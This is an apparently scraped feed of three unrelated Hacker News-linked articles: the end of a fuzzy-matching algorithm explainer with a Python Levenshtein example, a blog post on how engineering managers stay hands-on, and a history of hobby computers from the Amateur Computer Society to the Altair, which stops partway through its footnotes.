    • Peregrine: It is our own fuzzy matching algorithm and it was developed by Andrew Apell. It calculates the percentage similarity between the unique substrings contained in any two text entries.

    • Damerau–Levenshtein Distance: It calculates the minimum number of edits that are required to transform one word into the other. Valid edits are insertions, deletions, substitutions or transpositions of adjacent characters.

    • n-gram: It is a contiguous sequence of n items from any given text entry. It can be a sequence of syllables, letters, phonemes, words or base pairs according to the application.

    • Soundex: This algorithm indexes words by sound, as pronounced in English. The goal is for similar sounding words to be encoded to the same representation so that they can be compared, despite minor differences in spelling. Flookup uses a refined version of Soundex for matching text by sound similarity.

    • The Human Brain: "Aoccdrnig to a rscheearch at Cmabrigde Uinervtisy, it deosn't mtater in waht oredr the ltteers in a wrod are, the olny iprmoetnt tihng is taht the frist and lsat lteteer be at the rghit pclae. The rset can be a toatl mses and you can sitll raed it wouthit porbelm. Tihs is bcuseae the huamn mnid deos not raed ervey lteter by istlef, but the wrod as a wlohe."
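
As a worked example, here is a minimal Python sketch of the Levenshtein distance described above, using the classic dynamic-programming recurrence over insertions, deletions and substitutions, plus a conversion to the 0-100% similarity scale used throughout this guide.

```python
# A minimal Levenshtein distance (insertions, deletions, substitutions),
# computed row by row, plus a percentage-similarity wrapper.
def levenshtein(a: str, b: str) -> int:
    """Minimum number of single-character edits turning a into b."""
    prev = list(range(len(b) + 1))  # edit distances from "" to prefixes of b
    for i, ca in enumerate(a, start=1):
        curr = [i]  # deleting the first i characters of a yields ""
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution (or match)
        prev = curr
    return prev[-1]

def levenshtein_similarity(a: str, b: str) -> float:
    """Similarity as a percentage: 100% means the strings are identical."""
    if not a and not b:
        return 100.0
    return (1 - levenshtein(a, b) / max(len(a), len(b))) * 100

print(levenshtein("kitten", "sitting"))                       # 3
print(f"{levenshtein_similarity('kitten', 'sitting'):.0f}%")  # ~57%
```

Normalising the raw edit count by the length of the longer string is one common way to turn a distance into a percentage score; other scalings exist.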

]]>
https://www.getflookup.com/documentation/fuzzy-matching-algorithms-explained hacker-news-small-sites-43234078 Sun, 02 Mar 2025 19:32:30 GMT
<![CDATA[Hands-On as an Engineering Manager]]> thread link) | @kiyanwang
March 2, 2025 | https://www.chaitime.chaitalinarla.com/p/hands-on | archive.org

Recently I celebrated a special kind of anniversary: my decaversary (10 years) of becoming an engineering manager and giving up IC life! A question I was often asked, after years of managing and mentoring engineering managers, was:

How do you stay hands-on?

This question pops up in several ways. Sometimes it shows up as feedback to managers that they are “not technical enough.” Sometimes it causes “founder mode” vs “manager mode” debates. And sometimes it triggers the “should managers code?” question.

The root cause of all these questions and concerns is the same. Many engineering managers (and their managers) worry about losing touch with tech. They get pulled into things like performance reviews, team planning, status updates, team building, and cross-functional alignment.

“Losing touch with tech” is a real issue for engineering managers. At its mildest, it could confuse or stress the team because the manager might commit to the wrong projects or timelines. At its worst, it could make the manager's skills obsolete, which would be a problem if the manager had to move to another company or team. I've mostly seen it as a problem between those two extremes: it shows up as the manager's inability to accurately represent their team or guide them to the most impactful work.

But the solution is not to try to do your eng manager job while also trying to do IC work. This will lead to burnout for you and/or cause unnecessary friction for your team.

In today’s article, I talk about 5 roles engineering managers at all levels can take on to stay hands-on while still adding value to their team’s work.

This was a technique I’d followed often, but it wasn’t until my time at Stripe that I came across the term: friction logging. It involves thoroughly testing a journey, which can be a user journey in your product or a developer journey in your workflow. Then, write down your experience: capture what worked and what didn’t, and include clear recommendations to make the journey better.

I recommend doing this exercise periodically on developer journeys. It will help find where your team is facing friction. Then, you can make development easier and faster. Expanding this exercise beyond your team's circle can create a wider impact. You may discover friction affecting more developers than just your team.

Should engineering managers friction log user journeys? Or is that a thing for product managers only?

If you want to advance in your career, you must wear many hats and swap them often. At Stripe, I logged friction for our new embedded components' platform integration. I was able to see how things were from the platform’s perspective through an engineering lens. This helped us all - eng, product, GTM, and more - understand how to make this experience better!

Most engineering teams have many KTLO (keep-the-lights-on) tasks. These take time from other work. A long-term look at KTLO categories will reveal useful insights. You can use these insights for high-impact work.

In the early days of Google Compute Engine, I did a KTLO analysis. It found we weren't releasing every week as we thought. We had many rollbacks, so it was more like “2 steps forward, 1 step backward." The causes of these rollbacks revealed a few themes. We could use them to improve our release cadence. This, in turn, unlocked a major business milestone. A faster release cadence resolved 20% of our technical deal blockers (TDBs). These were features that were blocking new deals.

Here are some more examples of KTLO analysis I've done in the past:

  • A biannual analysis of our production incidents helped my team gain insights into reliability, leading to investments in projects like fault-tolerance testing and upstream performance testing.

  • Analysis of bugs reported in the last 3 months revealed our "bug factories," which helped us focus on those areas during design and code reviews.

One more thought on why undertaking KTLO analysis is high-value work. Most engineering organizations suffer from what I call the “infra project suspicion." It is often unclear what business needs "infra projects" will meet. These projects are technically dense, long-term, and preventive in nature. An example of an infra project would be “improve our release cadence." In contrast, "feature projects" have a clear goal: implement this feature. It is often easier to match this to business needs. KTLO analysis helps you support “infra projects” by linking them directly to business goals. In my example, it took almost a year to improve our release cadence. But, mapping it to the revenue it would unlock via the TDBs helped us allocate resources and keep our GM's support.

I highly recommend being part of your team’s on-call rotation! A few ways this will help you and your team:

  • You will stay connected to the vital parts of your system. You’ll feel what breaks often and recognize what has the biggest impact.

  • If you are plugged in, you can provide air cover to your team during on-call emergencies that get escalated.

  • You can also give praise when your team manages important issues well and recognize them for projects that stop potential breakage.

  • You likely have the least bandwidth on your team. If the team's docs and runbooks don't help you during your on-call, you can take back learnings on how to improve them (see the Archivist role below).

  • If the on-call experience frustrates you, it frustrates your team too. Or, they may have grown used to it, which could be a problem (normalization of deviance). Treating on-call as a type of friction logging journey will help you make it more efficient for your team.

I have to mention one more reason for being on-call as an engineering manager.

In my early days as an engineering manager, I had taken on a new team of 5 engineers. We were in charge of a critical piece of developer infra used by 1000+ engineers at the time. All my team members complained to me about how intense and demanding their on-call was. I was curious to experience this time sink myself and figure out whether I could reclaim some or all of this time for my team.

On my first day on call, I received 23 chat pings. They were all questions about using our infrastructure. The answers were already in our documentation! After the fifth such ping, I wrote a short message like this - “Hi! Thanks for using FooBar. Please visit <link> where you will find our quickstart guide and FAQs to help you get started.” I copy-pasted this message to all the chat pingers for the rest of the day. It was enough to solve their problems. The next day, I added a blurb to our on-call page. It said users should try the quickstart guide and the FAQ links before pinging the on-caller. After that update, I got no pings for the rest of my on-call shift with no noticeable drop in usage or quality of our infra.

As an engineering manager, you have a superpower. You can say no on behalf of your team. You're probably more comfortable doing it than they are. My team was being courteous. We were providing white-glove service to every user. This led to intense on-calls. I switched us to a more scalable approach. It did require saying no to many folks, both directly and indirectly. But it helped us reclaim valuable time. We spent that time improving our offerings. This provided greater benefits to our customers compared to our white-glove onboarding.

Ask any engineer, and they will tell you their #1 problem is documentation. Eng docs are always in need of updates, and there are always better ways to write them. A well-functioning eng team also creates many other docs beyond design docs and user documentation: postmortems for incidents, regular updates for project milestones, quarterly retrospectives for OKRs, monthly business review updates, and more. There may also be training docs from tech talks, brown bags, and other training sessions.

You can and should create some of these documents yourself. Most eng managers already do this. I’m not talking here about being a document writer; I’m talking about being your team’s archivist. The dictionary definition of an archivist is “a person who maintains and is in charge of archives." You are the only one who can play this role. As the team manager, most of the documentation likely comes to you. You don’t have to read it all, but cataloging and organizing it will be super valuable to your team!

You can take advantage of the advent of LLMs to analyze your archives in a significant way. As an example, one simple thing I did out of habit was to move all relevant docs of a type into a Google Drive folder. So all weekly ops review decks would be in a folder, for example. When Gemini became available in Google Drive, I could ask it all sorts of questions about my ops review data, which spanned weeks!

My lack of hands-on experience was acute at Stripe. I had "grown up" at Google, from IC to EM to Director. At Stripe, I directly stepped into a senior role. I did not have the experience of actually building and shipping code there!

I was fortunate to get the flexibility to do an “Engineerication” in my first 90 days at Stripe. An “engineerication” is a portmanteau of “engineering” + "vacation," but it is NOT a vacation! Regardless of your view on the "managers should code" debate, I HIGHLY recommend this approach for quickly learning tech in a new domain. Especially if you learn by doing, this will help you a lot more than reading docs or code.

All the activities I mentioned could be part of an engineerication. The key part that isn’t included in those activities, though, is writing, submitting, and deploying actual code.

Here are a few tips for planning and going on a successful engineerication:

  • Choose bite-sized tasks. I asked around for ideas suitable for first tasks for new junior engineers or interns and got quite a few good choices.

  • Choose tasks that are not in the critical path. You don't want your team unable to ship a key feature because your one PR was pending while you were off doing other manager-y things!

  • Choose representative tasks. It's easy to think, "My team uses Ruby, so I'll just do this Ruby tutorial for engineerication." But that misses the true goal of engineerication. The goal is to work in your team's codebase. Do a task someone on your team would do. This will give you a deeper understanding of how things work.

  • Be vulnerable. If you’ve followed the above tips, it is very likely your tasks are intern/new-grad shaped. You are going to run into issues working on them. And when you do, you’ll likely have to ask the junior team members for help getting you unstuck. Set your ego aside and enjoy the process of learning from them. Reverse-mentoring is a gift. It can help you gain knowledge and connections you'd otherwise miss.

  • Beginning, middle, and end. You must prioritize your engineerication to make it meaningful. I found it helpful to have a clear start, middle, and end. This way, I could stay accountable. The junior team members also felt that I valued their time. This also let me limit my engineerication: I could wrap it up and move on after my timeline or milestones finished.

Readers, what are your tips and tricks to stay hands-on in a management role?


]]>
https://www.chaitime.chaitalinarla.com/p/hands-on hacker-news-small-sites-43233824 Sun, 02 Mar 2025 19:09:28 GMT
<![CDATA[From ACS to Altair: The Rise of the Hobby Computer]]> thread link) | @cfmcdonald
March 2, 2025 | https://technicshistory.com/2025/02/22/from-acs-to-altair-the-rise-of-the-hobby-computer/ | archive.org

[This post is part of “A Bicycle for the Mind.” The complete series can be found here.]

The Early Electronics Hobby

A certain pattern of technological development recurred many times in the decades around the turn of the twentieth century: a scattered hobby community, tinkering with a new idea, develops it to the point where those hobbyists can sell it as a product. This sets off a frenzy of small entrepreneurial firms, competing to sell to other hobbyists and early adopters. Finally, a handful of firms grow to the point where they can drive down costs through economies of scale and put their smaller competitors out of business. Bicycles, automobiles, airplanes, and radio broadcasting all developed more or less in this way.

The personal computer followed this same pattern; indeed, it marks the very last time that a “high-tech” piece of hardware emerged from this kind of hobby-led development. Since that time, new hardware technology has typically depended on new microchips. That is a capital barrier far too high for hobbyists to surmount; but as we have seen, the computer hobbyists lucked into ready-made microchips created for other reasons, but already suited to their purposes.

The hobby culture that created the personal computer was historically continuous with the American radio hobby culture of the early twentieth-century, and, to a surprising degree, the foundations of that culture can be traced back to the efforts of one man: Hugo Gernsback. Gernsback (born Gernsbacher, to well-off German Jewish parents) came to the United States from Luxembourg in 1904 at the age of nineteen, shortly after his father’s death. Already fascinated by electrical equipment, American culture, and the fiction of Jules Verne and H.G. Wells, he started a business, the Electro Importing Company, in Manhattan, that offered both retail and mail-order sales of radios and related equipment. His company catalog evolved into a magazine, Modern Electrics, and Gernsback evolved into a publisher and community builder (he founded the Wireless Association of America in 1909 and the Radio League of America in 1915), a role he relished for the rest of his working life.[1]

Gernsback (foreground) giving an over-the-air lecture on the future of radio. From his 1922 book, Radio For All, p. 229.

The culture that Gernsback nurtured valued hands-on tinkering and forward-looking futurism, and in fact viewed them as two sides of the same coin. Science fiction (“scientifiction,” as Gernsback called it) writing and practical invention went hand in hand, for both were processes for pulling the future into the present. In a May 1909 article in Modern Electrics, for example, Gernsback opined on the prospects for radio communication with Mars: “If we base transmission between the earth and Mars at the same figure as transmission over the earth, a simple calculation will reveal that we must have the enormous power of 70,000 K. W. to our disposition in order to reach Mars,” and went on to propose a plan for building such a transmitter within the next fifteen or twenty years.

As science fiction emerged as its own genre with its own publications in the 1920s (many of them also edited by Gernsback), this kind of speculative article mostly disappeared from the pages of electronic hobby magazines. Gernsback himself occasionally dropped in with an editorial, such as a 1962 piece in Radio-Electronics on computer intelligence, but the median electronic magazine article had a much more practical focus. Readers were typically hobbyists looking for new projects to build or service technicians wanting to keep up with the latest hardware and industry trends.[2]

Nonetheless, the electronic hobbyists were always on the lookout for the new, for the expanding edge of the possible: from vacuum tubes, to televisions, to transistors, and beyond. It’s no surprise that this same group would develop an early interest in building computers. Nearly everyone who we find building (or trying to build) a personal or home computer prior to 1977 had close ties to the electronic hobby community.

The Gernsback story also highlights a common feature of hobby communities of all sorts. A subset of radio enthusiasts, seeing the possibility of making money by fulfilling the needs of their fellow hobbyists, started businesses to make new equipment for hobby projects, retail businesses to sell that equipment, or publishing businesses to keep the community informed on new equipment and other hobby news. Many of these enterprises made little or no money (at least at first), and were fueled as much by personal passion as by the profit motive; they were the work of hobby-entrepreneurs. It was this kind of hobby-entrepreneur who would first make personal computers available to the public.

The First Personal Computer Hobbyists

The first electronic hobbyist we know of to take an interest in building computers was Stephen Gray. In 1966, he founded the Amateur Computer Society (ACS), an organization that existed mainly to produce a series of quarterly newsletters typed and mimeographed by Gray himself. Gray has little to say about his own biography in the newsletter or in later reflections on the ACS. He reveals that he worked as an editor of the trade magazine Electronics, that he lived in Manhattan and then Darien, Connecticut, that he had been trying to build a computer of his own for several years, and little else. But he clearly knew the radio hobby world. In the fourth number of his newsletter, in February 1967, he floated the idea of a “Standard Amateur Computer Kit” (SACK) that would provide an economical starting point for new hobbyists, writing that,[3]

Amateur computer builders are now much like the early radio amateurs. There’s a lot of home-brew equipment, much patchwork, and most commercial stuff is just too expensive. The ACS can help advance the state of the amateur computer art by designing a standard amateur computer, or at least setting up the specs for one. Although the mere idea of a standard computer makes the true blue home-brew types shudder, the fact is that amateur radio would not be where it is today without the kits and the off-the-shelf equipment available.[4]

By the Spring of 1967, Gray had found seventy like-minded members through advertisements in trade and hobby publications, most of them in the United States, but a handful in Canada, Europe, and Japan. We know little about the backgrounds or motivations of these men (and they were exclusively men), but when their employment is mentioned, they are found at major computer, electronics, or aerospace firms; at national labs; or at large universities. We can surmise that most worked with or on computers as part of their day job.

A few letter writers disclose prior involvement in hobby electronics and radio, and from the many references to attempts to imitate the PDP-8 architecture, we can also guess that many members had some association with DEC minicomputer culture. It is speculative but plausible to guess that the 1965 release of the PDP-8 might have instigated Gray’s own home computer project and the later creation of the ACS. Its relatively low price, compact size, and simple design may have catalyzed the notion that home computers lay just out of reach, at least for Gray and his band of like-minded enthusiasts.

Whatever their backgrounds and motivations, the efforts of these amateurs to actually build a computer proved mostly fruitless in these early years. The January 1968 newsletter reported a grand total of two survey respondents who possessed an actual working computer, though respondents as a whole had sunk an average of two years and $650 on their projects ($6,000 in 2024 dollars). The problem of assembling one’s own computer would daunt even the most skilled electronic hobbyist: no microprocessors existed, nor any integrated circuit memory chips, and indeed virtually no chips of any kind, at least at prices a “homebrewer” could afford.

Both of the complete computers reported in the survey were built from hand-wired transistor logic. One was constructed from the parts of an old nuclear power system control computer, PRODAC IV. Jim Sutherland took the PRODAC’s remains home from his work at Westinghouse after its retirement, and re-dubbed it the ECHO IV (for Electronic Computing Home Operator). Though technically a “home” computer, to borrow an existing computer from work was not a path that most would-be home-brewers could follow. This hardly had the makings of a technological revolution. The other complete “computer,” the EL-65 by Hans Ellenberger of Switzerland, was really just an electronic desktop calculator; it could perform arithmetic ably enough, but could not be programmed.[5]

The Emergence of the Hobby-Entrepreneur

As integrated circuit technology got better and cheaper, the situation for would-be computer builders gradually improved. By 1971, the first, very feeble, home computer kits appeared on the market, the first signs of Gray’s “SACK.” Though neither used a microprocessor, they took advantage of the falling prices of integrated circuits: the CPU of each consisted of dozens of small chips wired together. The first was the National Radio Institute (NRI) 832, the hardware accompaniment to a computer technician course disseminated by the NRI, and priced at about $500. Unsurprisingly, the designer, Lou Frenzel, was a radio hobby enthusiast, and a subscriber to Stephen Gray’s ACS Newsletter. But the NRI 832 is barely recognizable as a functional computer: it had a measly sixteen 8-bit words of read-only memory, configured by mechanical switches (with an additional sixteen bytes of random-access memory available for purchase).[6]

The NRI 832. The switches on the left were used to set the values of the bits in the tiny memory. The banks of lights at the top left and right, showing the binary values of the program counter and accumulator, were the only form of output  [vintagecomputer.net]

The $750 Kenbak-1 that appeared the same year was nominally more capable, with 256 bytes of memory, though implemented with shift-register chips (accessible one bit at a time), not random-access memory. Indeed, the entire machine had a serial-processing architecture, processing only one bit at a time through the CPU, and ran at only about 1,000 instructions per second—very slow for an electronic computer. Like the NRI 832, it offered only switches as input and only a small panel of display lights for showing register contents as output. Its creator, John Blankenbaker, was a radio lover from boyhood before enrolling as an electronics technician in the Navy. He began working on computers in the 1950s, beginning with the Bureau of Standards SEAC. Intrigued by the possibility of bringing a computer home, he tinkered with spare parts for making his own computer for years, becoming his own private ACS. By 1971 he thought he had a saleable device that could be used for teaching programming, and he formed the eponymous “Kenbak” company to sell it.[7]

Blankenbaker was the first of the amateur computerists to try to bring his passion to market; the first hobby-entrepreneur of the personal computer. He was not the most successful. I found no records of the sales of the NRI 832, but by Blankenbaker’s own testimony, only forty-four Kenbak-1s were sold. Here were home computer kits readily available at a reasonable price, four years before Altair. Why did they fall flat? As we have seen, most members of the Amateur Computer Society had aimed to make a PDP-8 or something like it; this was the most familiar computer of the 1960s and early 1970s, and provided the mental model for what a home computer could and should be. The NRI 832 and Kenbak-1 came nowhere close to the capabilities of a PDP-8, nor were they designed to be extensible or expandable in any way that might allow them to transcend their basic beginnings. These were not machines to stir the imaginative loins of the would-be home computer owner.

Hobby-Entrepreneurship in the Open

These early, halting steps towards a home computer, from Stephen Gray to the Kenbak-1, took place in the shadows, unknown to all but a few, the hidden passion of a handful of enthusiasts exchanging hand-printed newsletters. But several years later, the dream of a home computer burst into the open in a series of stories and advertisements in major hobby magazines. Microprocessors had become widely available. For those hooked on the excitement of interacting one-on-one with a computer, the possibility of owning their own machine felt tantalizingly close. A new group of hobby-entrepreneurs now tried to make their mark by providing computer kits to their fellow enthusiasts, with rather more success than NRI and Kenbak.

The overture came in the fall of 1973, with Don Lancaster’s “TV Typewriter,” featured on the cover of the September issue of Radio-Electronics (a Gernsback publication, though Gernsback himself was, by then, several years dead). Lancaster, like most of the people we have met in this chapter, was an amateur “ham” radio operator and electronics tinkerer. Though he had a day job at Goodyear Aerospace in Phoenix, Arizona, he figured out how to make a few extra bucks from his hobby by publishing projects in magazines and selling pre-built circuit boards for those projects via a Texas hobby firm called Southwest Technical Products (SWTPC).

The 1973 Radio-Electronics TV Typewriter cover.

His TV Typewriter was, of course, not a computer at all, but the excitement it generated certainly derived from its association with computers. One of many obstacles to a useful home computer was the lack of a practical output device: something more useful than the handful of glowing lights that the Kenbak-1 sported, but cheaper and more compact than the then-standard computer input/output device, a bulky teletype terminal. Lancaster’s electronic keyboard, which required about $120 in parts, could hook up to an ordinary television and turn it into a video text terminal, displaying up to sixteen lines of thirty-two characters each. Shift-registers continued to be the only cheap form of semiconductor memory, and so that was what Lancaster used for storing the characters to be displayed on screen. Lancaster gave the parts list and schematic for the TV Typewriter away for free, but made money by selling pre-built subassemblies via SWTPC that saved buyers time and effort, and by publishing guidebooks like the TV Typewriter Cookbook.[8]

The next major landmark appeared six months later in a ham radio magazine, QST, named after the three-letter ham code for “calling all stations.” A small ad touted the availability of “THE TOTALLY NEW AND THE VERY FIRST MINI-COMPUTER DESIGNED FOR THE ELECTRONIC/COMPUTER HOBBYIST” with kit prices as low as $440. This was the SCELBI-8H, the first computer kit based around a microprocessor, in this case the Intel 8008. Its creator, Nat Wadsworth, lived in Connecticut, and became enthusiastic about the microprocessor after attending a seminar given by Intel in 1972, as part of his job as an electrical engineer at an electronics firm. Wadsworth was another ham radio enthusiast, and already enough of a personal computing obsessive to have purchased a surplus DEC PDP-8 at a discount for home use (he paid “only” $2,000, about $15,000 in 2024 dollars). Since his employer did not share his belief in the 8008, he looked for another outlet for his enthusiasm, and teamed up with two other engineers to develop what became the SCELBI-8H (for SCientific ELectronic BIological). Their ads drew thousands of responses and hundreds of orders over the following months, though they ended up losing money on every machine sold.[9]

A similar machine appeared several months later, this time as a hobby magazine story, on the cover of the July 1974 issue of Radio-Electronics: “Build the Mark-8 Minicomputer,” ran the headline (notice again the “minicomputer” terminology: a PDP-8 of one’s own remained the dream). The Mark-8 came from Jonathan Titus, a grad student from Virginia, who had built his own 8008-based computer and wanted to share the design with the rest of the hobby. Unlike SCELBI, he did not sell it as a complete machine or even a kit: he expected the Radio-Electronics reader to buy and assemble everything themselves. That is not to say that Titus made no money: he followed a hobby-entrepreneur business model similar to Don Lancaster’s, offering an instructional guidebook for $5, and making some pre-made boards available for sale through a retailer in New Jersey, Techniques, Inc.

The 1974 Mark-8 Radio-Electronics cover.

The SCELBI-8H and Mark-8 looked much more like a “real” minicomputer than the NRI 832 or Kenbak-I. A hobbyist hungry for a PDP-8-like machine of their own could recognize in this generation of machines something edible, at least. Both used an eight-bit parallel processor, not an antiquated bit-serial architecture, came with one kilobyte of random-access memory, and were designed to support textual input/output devices. Most importantly both could be extended with additional memory or I/O cards. These were computers you could tinker with, that could become an ongoing hobby project in and of themselves. A ham radio operator and engineering student in Austin, Texas named Terry Ritter spent over a year getting his Mark-8 fully operational with all of the accessories that he wanted, including an oscilloscope display and cassette tape storage.[10]

In the second half of 1974, a community of hundreds of hobbyists like Ritter began to form around 8008-based computers, significantly larger than the tiny cadre of Amateur Computer Society members. In September 1974, Hal Singer began publishing the Mark-8 User Group Newsletter (later renamed the Micro-8 Newsletter) for 8008 enthusiasts out of his office at the Cabrillo High School Computer Center in Lompoc, California. He attracted readers from all across the country: California and New York, yes, but also Iowa, Missouri, and Indiana. Hal Chamberlin started the Computer Hobbyist newsletter two months later. Hobby entrepreneurship expanded around the new machines as well: Robert Suding formed a company in Denver called the Digital Group to sell a packet of upgrade plans for the Mark-8.[11]

The first tender blossoms of a hobby computer community had begun to emerge. Then another computer arrived like a spring thunderstorm, drawing whole gardens of hobbyists up across the country and casting the efforts of the likes of Jonathan Titus and Hal Singer in the shade. It, too, came as a response to the arrival of the Mark-8, by a rival publication in search of a blockbuster cover story of their own.

Altair Arrives

Art Salsberg and Les Solomon, editors at Popular Electronics, were not oblivious to the trends in the hobby, and had been on the lookout for a home computer kit they could put on their cover since the appearance of the TV Typewriter in the fall of 1973. But the July 1974 Mark-8 cover story at rival Radio-Electronics threw a wrench in their plans: they had an 8008-based design of their own lined up, but couldn’t publish something that looked like a copy-cat machine. They needed something better, something to one-up the Mark-8. So, they turned to Ed Roberts. He had nothing concrete, but had pitched Solomon a promise that he could build a computer around the new, more powerful Intel 8080 processor. This pitch became Altair—named, according to legend, by Solomon’s daughter, after the destination of the Enterprise in the Star Trek episode “Amok Time”—and it set the hobby electronics world on fire when it appeared as the January 1975 Popular Electronics cover story.

The famous Popular Electronics Altair cover story.

Altair, it should be clear by now, was continuous with what came before: people had been dreaming of and hacking together home computers for years, and each year the process became easier and more accessible, until by 1974 any electronics hobbyist could order a kit or parts for a basic home computer for around $500. What set the Altair apart, what made it special, was the sheer amount of power it offered for the price, compared to the SCELBI-8H and Mark-8. The Altair’s value proposition poured gasoline onto smoldering embers: it was an accelerant that transformed a slowly expanding hobby community into a rapidly expanding industry.

The Altair’s surprising power derived ultimately from the nerve of MITS founder Ed Roberts. Roberts, like so many of his fellow electronics hobbyists, had developed an early passion for radio technology that was honed into a professional skill by technical training in the U.S. armed forces—the Air Force, in Roberts’ case. He founded Micro Instrumentation and Telemetry Systems (MITS) in Albuquerque with fellow Air Force officer Forrest Mims to sell electronic telemetry modules for model rockets. A crossover hobby-entrepreneur business, this straddled two hobby interests of the founders, but did not prove very profitable. A pivot in 1971 to sell low-cost kits to satiate the booming demand for pocket calculators, on the other hand, proved very successful—until it wasn’t. By 1974 the big semiconductor firms had vertically integrated and driven most of the small calculator makers out of business.

For Roberts, the growing hobby interest in home computers offered a chance to save a dying MITS, and he was willing to bet the company on that chance. Though already $300,000 in debt, he secured a loan of $65,000 from a trusting local banker in Albuquerque, in September 1974. With that money, he negotiated a steep volume discount from Intel by offering to buy a large quantity of “ding-and-dent” 8080 processors with cosmetic damage. Though the 8080 listed for $360, MITS got them for $75 each. So, while Wadsworth at SCELBI (and builders assembling their own Mark-8s) were paying $120 for 8008 processors, MITS was paying nearly half that for a far better processor.[12]

It is hard to overstate what a substantial leap forward in capabilities the 8080 represented: it ran much faster than the 8008, integrated more capabilities into a single chip (for which the 8008 required several auxiliary chips), could support four times as much memory, and had a much more flexible 40-pin interface (versus the 18 pins on the 8008). The 8080 also referenced a program stack in external memory, while the 8008 had a strictly size-limited on-CPU stack, which limited the software that could be written for it. The 8080 represented such a large leap forward that, until 1981, essentially the entire personal and home computer industry ran on the 8080 and two similar designs: the Zilog Z80 (a processor that was software-compatible with the 8080 but ran at higher speeds), and the MOS Technology 6502 (a budget chip with roughly the same capabilities as the 8080).[13]

The release of the Altair kit at a total price of $395 instantly made the 8008-based computers irrelevant. Nat Wadsworth of SCELBI reported that he was “devastated by appearance of Altair,” and “couldn’t understand how it could sell at that price.” Not only was the price right, the Altair also looked more like a minicomputer than anything before it. To be sure, it came standard with a measly 256 bytes of memory and the same “switches and lights” interface as the ancient kits from 1971. It would take quite a lot of additional money and effort to turn into a fully functional computer system. But it came full of promise, in a real case with an extensible card slot system for adding additional memory and input/output controllers. It was by far the closest thing to a PDP-8 that had ever existed at a hobbyist price point—just as the Popular Electronics cover claimed: “World’s First Minicomputer Kit to Rival Commercial Models.” It made the dream of the home computer, long cherished by thousands of computer lovers, seem not merely imminent, but immanent: the digital divine made manifest. And this is why the arrival of the MITS Altair, not of the Kenbak-1 or the SCELBI-8H, is remembered as the founding event of the personal computer industry.[14]

All that said, even a tricked-out Altair was hardly useful, in an economic sense. If pocket calculators began as a tool for business people, and then became so cheap that people bought them as a toy, the personal computer began as something so expensive and incapable that only people who enjoyed them as a toy would buy them. Next time, we will look at the first years of the personal computer industry: a time when the hobby computer producers briefly flourished and then wilted, mostly replaced and outcompeted by larger, more “serious” firms. But a time when the culture of the typical computer user remained very much a culture of play.

Appendix: Micral N, The First Useful Microcomputer

There is another machine sometimes cited as the first personal computer: the Micral N. Much like Nat Wadsworth, French engineer François Gernelle was smitten with the possibilities opened up by the Intel 8008 microprocessor, but could not convince his employer, Intertechnique, to use it in their products. So, he joined other Intertechnique defectors to form Réalisation d’Études Électroniques (R2E), and began pursuing some of their erstwhile company’s clients.

In December 1972, R2E signed an agreement with one of those clients, the Institut National de la Recherche Agronomique (INRA, a government agronomical research center), to deliver a process control computer for their labs at a fraction of the price of a PDP-8. Gernelle and his coworkers toiled through the winter in a basement in the Paris suburb of Châtenay-Malabry to deliver a finished system in April 1973, based on the 8008 chip and offered at a base price of 8,500 francs, about $2,000 in 1973 dollars (one fifth the going rate for a PDP-8).[15]

The Micral N was a useful computer, not a toy or a plaything. It was not marketed and sold to hobbyists, but to organizations in need of a real-time controller. That is to say, it served the same role in the lab or factory floor that minicomputers had served for the previous decade. It can certainly be called a microcomputer by dint of its hardware. But the Altair lineage stands out because it changed how computers were used and by whom; the microprocessor happened to make that economically possible, but it did not automatically make every machine into which it was placed a personal computer.

The Micral N looks very much like the Altair on the outside, but was marketed entirely differently [Rama, Cc-by-sa-2.0-fr].

Useful personal computers would come, in time. But the demand that existed for a computer in one’s own home or office in the mid-1970s came from enthusiasts with a desire to tinker and play on a computer, not to get serious business done on one. No one had yet written and published the productivity software that would even make a serious home or office computer conceivable. Moreover, it was still far too expensive and difficult to assemble a comprehensive office computer system (with a display, ample memory, and external mass storage for saving files) to attract people who didn’t already love working on computers for their own sake.

Until these circumstances changed, which would take several years, play reigned unchallenged among home computer users. The Micral N is an interesting piece of history, but it is an instructive contrast with the story of the personal computer, not a part of it.


[1] Grant Wythoff, ed., The Perversity of Things: Hugo Gernsback on Media, Tinkering, and Scientifiction (Minneapolis: University of Minnesota Press, 2016), 11-16; Keith Massie and Stephen D. Perry, “Hugo Gernsback and Radio Magazines: An Influential Intersection in Broadcast History,” Journal of Radio Studies 9, 2 (2002), 264-281.

[2] Hugo Gernsback, “Are Thinking Computers Possible,” Radio-Electronics (August 1962), 25.

[3] Stephen Gray, “The Early Days of Personal Computers”, Creative Computing 10, 11 (November 1984), 6.

[4] Stephen Gray, “Standard Amateur Computer Kit,” ACS Newsletter no. 4 (February 1967), 4. The reference to “home-brew” is interesting, and would recur in the famous Bay Area Homebrew Computer Club. Though technically illegal until 1978 (and illegal in many states for years thereafter), home-brewed beer was becoming increasingly popular in the United States in the 1960s; the amateur computerists clearly felt some affinity between their work and this other semi-illicit hobby.

[5] “ACS Computer Survey Results,” ACS Newsletter no. 8, January 1968; Dave Cortesi, “The First Home Computer,” Computer History Museum Volunteer Information Exchange 5, 8 (September 11, 2015), 2-3.

[6] “NRI-832”, Old Computer Museum, https://www.oldcomputermuseum.com/nri_832.html; William G. Wong, “Remembering a Communications Legend,” Electronic Design (January 19, 2023), https://www.electronicdesign.com/blogs/altembedded/article/21258411/electronic-design-remembering-a-communications-legend; Lou Frenzel, “The History of Personal Computers – Part 1: The East Coast Version,” Electronic Design (December 12, 2013), https://www.electronicdesign.com/technologies/industrial/systems/article/21798814/the-history-of-personal-computers-part-1-the-east-coast-version

[7] Lee Felsenstein, “Oral History of John Blankenbaker,” Computer History Museum (June 14, 2007).

[8] Don Lancaster, “The Way Things Were,” Blatant Opportunist 63 (July-August 2001), 1-5; Don Lancaster, “TV Typewriter,” Radio-Electronics (September 1973), 43-52.

[9] “The history of SCELBI as told by Nat Wadsworth,” Scelbi Computer Museum, https://www.scelbi.com/history-by-nat; “interview with Jack Rubin,” Scelbi History Museum, https://www.scelbi.com/history-jack-rubin-interview; “SCELBI Computer Consulting, Inc.,” QST (March 1974), 154.

[10] Terry Ritter, “A Mark-8 Experience,” Ciphers by Ritter, February 21, 2002, http://www.ciphersbyritter.com/MARK8/MARK8.HTM

